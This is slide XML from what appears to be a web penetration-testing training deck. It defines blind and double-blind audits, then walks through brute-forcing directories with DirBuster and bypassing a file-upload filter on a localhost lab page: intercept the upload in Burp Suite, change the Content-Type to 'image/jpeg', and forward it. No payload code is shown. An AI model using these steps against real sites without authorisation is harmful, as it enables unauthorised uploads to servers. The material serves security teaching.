          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="504" name="Picture 2"/>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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-76320"/>
            <a:ext cx="6857640" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Task 1
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Objective : Brute-forcing directories with our list</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="506"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1.		Using DirBuster to locate our uploaded file</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>2.		Add to your file ‘mylist.txt’ of these directories :</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>uploadfile</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>uploadfail</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>uplot</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>tempatfail</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>tempatrujukanpersuratan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>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Blind</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1752480"/>
            <a:ext cx="7619760" cy="4373280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>The Analyst engages the target with no prior knowledge of its defenses, assets, or channels. The target is prepared for the audit, knowing in advance all the details of the audit. A blind audit primarily tests the skills of the Analyst. The breadth and depth of a blind audit can only be as vast as the Analyst’s applicable knowledge and efficiency allows. In COMSEC and SPECSEC, this is often referred to as Ethical Hacking and in the PHYSSEC class, this is generally scripted as War Gaming or Role Playing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246"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47"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48"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AAF92554-C1A4-44DA-A78A-17C6C0A9C6D3}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="249"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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-76320"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Review our code!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="508" name="Picture 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="762120" y="1295280"/>
            <a:ext cx="7392600" cy="447156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457200" y="-152280"/>
            <a:ext cx="8762760" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Case 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>
http://localhost/upload/upload2/lampiran.html</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="511" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304920" y="1219320"/>
            <a:ext cx="8381520" cy="495252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457200" y="1447920"/>
            <a:ext cx="7772040" cy="4320720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="513" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="228600"/>
            <a:ext cx="7772040" cy="1066320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Cannot upload the file</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="514"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515"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4181D446-49F3-4E47-9601-81FABE1927D2}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="516"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517" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1521000"/>
            <a:ext cx="7772040" cy="480348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1447920"/>
            <a:ext cx="7772040" cy="4320720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>We will use ‘Tamper Data’ technique. What we need is:
Web Proxy ( Burp Suite )
Or
Tamper Data ( Mozilla Add-on )
</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="519" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="228600"/>
            <a:ext cx="7772040" cy="1066320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="520"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521"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03A1A8B4-FF44-42B1-9825-B4F3F3FC0056}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="522"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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1447920"/>
            <a:ext cx="7772040" cy="4320720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Download at http://portswigger.net/burp/
It is an executable file built using Java programming
To use it:
Set web browser proxy to localhost/127.0.01
Set the port to 8080
</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="524" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="228600"/>
            <a:ext cx="8305560" cy="1066320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Web Proxy ( Burp Suite – Free Edition )</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="525"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526"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BEBF1D2C-1D04-4CE4-98C8-E3A4C7E45EE6}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="527"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457200" y="1447920"/>
            <a:ext cx="7772040" cy="4320720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="529" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="228600"/>
            <a:ext cx="7772040" cy="1066320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Burp Suite GUI</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530"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531" name="TextShape 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="8227080" y="5885640"/>
            <a:ext cx="1315440" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="45720" tIns="91440" rIns="45720" bIns="91440" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{1193B658-E8FA-4179-9D8B-A32D12FB8246}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="532" name="TextShape 5"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="533" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1523880"/>
            <a:ext cx="7745040" cy="487656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457200" y="-152280"/>
            <a:ext cx="7238520" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Make sure the ‘Intercept is on’</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="535" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="536" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="5105160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="537" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="1600200"/>
            <a:ext cx="837720" cy="304560"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="28440">
            <a:solidFill>
              <a:srgbClr val="5A5A5A"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="538" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048120" y="2286000"/>
            <a:ext cx="837720" cy="30456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152280"/>
            <a:ext cx="7772040" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Change the Content-Type to ‘image/jpeg’</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="541" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="5105160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="542" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048120" y="4267080"/>
            <a:ext cx="837720" cy="22824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Click ‘forward’</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="544" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="545" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="5105160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="546" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209680" y="4267080"/>
            <a:ext cx="837720" cy="228240"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="28440">
            <a:solidFill>
              <a:srgbClr val="5A5A5A"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="547" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="2286000"/>
            <a:ext cx="837720" cy="22824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Ho-Yeay!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="550"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Double blind</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1752480"/>
            <a:ext cx="7619760" cy="4373280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>The Analyst engages the target with no prior knowledge of its defenses, assets, or channels. The target is not notified in advance of the scope of the audit, the channels tested, or the test vectors. A double blind audit tests the skills of the Analyst and the preparedness of the target to unknown variables of agitation. The breadth and depth of any blind audit can only be as vast as the Analyst’s applicable knowledge and efficiency allows. This is also known as a Black Box test or Penetration test.</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252"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53"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54"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31BEB719-D853-45EE-A3BC-23CE5B470ABD}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="255"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Review our code!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="552" name="Picture 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1219320"/>
